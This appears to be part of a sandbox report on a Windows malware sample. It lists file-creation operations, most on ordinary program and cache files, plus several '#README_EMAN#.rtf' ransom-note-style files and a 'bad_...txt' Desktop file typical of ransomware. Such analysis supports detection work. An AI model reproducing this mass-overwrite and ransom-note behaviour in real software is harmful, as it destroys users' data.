| Create | C:\Users\All Users\Adobe\ARM\Reader_17.012.20098\AcroRdrDCUpd1800920044_incr.msp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\EDA58A0B-AD79-496A-8530-618D08767E60\en-us.16\stream.x64.en-us.hash | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.016.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.002.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.012.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\en-us.16\s641033.hash | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\packages\vcRuntimeMinimum_x86\cab1.cab | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Package Cache\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\packages\vcRuntimeMinimum_amd64\cab1.cab | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\vcRuntimeMinimum_x86\cab1.cab | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Package Cache\{e52a6842-b0ac-476e-b48f-378a97a67346}\state.rsm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\USOShared\Logs\UpdateSessionOrchestration.002.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\USOShared\Logs\UpdateSessionOrchestration.012.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Diagnosis\DownloadedScenarios\Windows.Uif.static | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\ClickToRun\8C296B8E-6699-457C-9415-3D0647E1D775\x-none.16\s640.hash | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt17.lst | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Recovery\WindowsRE\Winre.wim | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.007.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\MF\Pending.GRL | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\x-none.16\stream.x64.x-none.man.dat | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\EDA58A0B-AD79-496A-8530-618D08767E60\x-none.16\stream.x64.x-none.hash | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\data_1 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Comms\UnistoreDB\USS.chk | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\msoutilstat.etw.man | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.017.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Diagnosis\DownloadedScenarios\WINDOWS.PERFTRACKPOINTDATA.xml.new | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Diagnosis\parse.dat | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\User Account Pictures\user.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\ClickToRun\8C296B8E-6699-457C-9415-3D0647E1D775\x-none.16\stream.x64.x-none.man.dat | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000003 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Oracle\Java\javapath_target_5923062\javaw.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Package Cache\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\state.rsm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\vcRuntimeAdditional_x86\cab1.cab | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Package Cache\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\packages\vcRuntimeAdditional_amd64\cab1.cab | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\USOShared\Logs\UpdateSessionOrchestration.010.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\USOShared\Logs\UpdateUx.001.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Adobe\Acrobat\DC\UserCache.bin | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000d | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Oracle\Java\javapath\javaws.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Package Cache\{3c3aafc8-d898-43ec-998f-965ffdae065a}\state.rsm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\packages\vcRuntimeMinimum_amd64\cab1.cab | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\cab1.cab | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\USOShared\Logs\UpdateSessionOrchestration.008.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\USOShared\Logs\UpdateSessionOrchestration.018.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Adobe\Color\Profiles\wsRGB.icc | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\EDA58A0B-AD79-496A-8530-618D08767E60\x-none.16\stream.x64.x-none.man.dat | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000001 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000017 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000b | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.app.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\User Account Pictures\user-32.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt15.lst | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Current Session | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Oracle\Java\javapath\java.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Oracle\Java\installcache_x64\baseimagefam8 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Adobe\Color\ACECache11.lst | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extension State\CURRENT | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\cab1.cab | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\wordEtw.man | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\bg\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\et\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\ko\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Package Cache\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\packages\vcRuntimeMinimum_x86\cab1.cab | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\state.rsm | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\packages\vcRuntimeAdditional_x86\cab1.cab | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\USOShared\Logs\UpdateSessionOrchestration.006.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\USOShared\Logs\UpdateSessionOrchestration.016.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt17.lst | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\data_2 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000015 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\ru\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\zh_TW\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\gmp-clearkey\0.1\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\ca\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\data_0 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Comms\UnistoreDB\store.vol | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Recovery\WindowsRE\boot.sdi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Adobe\ARM\Reader_17.012.20098\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\ProgramData\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\packages\vcRuntimeMinimum_x86\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000009 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Visited Links | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\data_0 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000007 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000013 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Diagnosis\DownloadedScenarios\WINDOWS.SIUF.xml.new | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\MF\Active.GRL | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00001e | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\fi\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Oracle\Java\javapath_target_5923062\java.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Package Cache\{3c3aafc8-d898-43ec-998f-965ffdae065a}\vcredist_x64.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\packages\vcRuntimeMinimum_amd64\vc_runtimeMinimum_x64.msi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\vc_runtimeMinimum_x64.msi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\USOShared\Logs\UpdateSessionOrchestration.009.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\All Users\USOShared\Logs\UpdateSessionOrchestration.019.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Adobe\Color\Profiles\wscRGB.icc | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\index | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Package Cache\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\packages\vcRuntimeMinimum_amd64\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\bad_460F9943EA70F103.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\CURRENT | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\lt\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\sk\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
